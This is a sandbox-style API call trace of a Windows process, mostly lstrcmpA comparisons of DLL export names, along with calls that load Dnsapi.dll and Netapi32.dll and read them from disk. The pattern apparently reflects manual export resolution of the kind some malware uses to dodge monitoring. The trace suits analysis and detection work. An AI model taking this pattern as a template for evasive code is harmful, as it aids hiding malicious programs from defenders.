[0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0232.744] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0232.745] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.745] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0232.746] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0232.747] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0232.748] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0232.748] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0232.748] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0233.019] GetProcessHeap () returned 0x480000 [0233.020] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x410a040 | out: hHeap=0x480000) returned 1 [0233.597] GetProcessHeap () returned 0x480000 [0233.597] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x4996e0 [0233.597] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0233.614] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0233.614] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0233.614] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0233.614] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0233.614] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0233.615] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0233.615] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0233.615] GetProcessHeap () returned 0x480000 [0233.615] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0xa7b88) returned 0x3a7d010 [0233.617] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0233.617] ReadFile (in: hFile=0x17c, lpBuffer=0x3a7d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a7d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0233.883] CloseHandle (hObject=0x17c) returned 1 [0233.892] GetProcessHeap () returned 0x480000 [0233.892] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x3a7d010 | out: hHeap=0x480000) returned 1 [0233.892] GetProcessHeap () returned 0x480000 [0233.892] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499a00 [0233.893] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0233.897] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0233.897] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0233.897] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0233.897] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0233.898] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0233.898] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0233.898] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0233.898] GetProcessHeap () returned 0x480000 [0233.898] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x13b00) returned 0x2d45030 [0233.899] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0233.899] ReadFile (in: hFile=0x17c, lpBuffer=0x2d45030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d45030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0233.899] CloseHandle (hObject=0x17c) returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0233.899] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0233.900] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0233.901] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0233.902] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0233.902] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0233.903] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0233.904] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0233.905] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0233.905] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0233.906] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0233.907] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0233.907] lstrcmpA 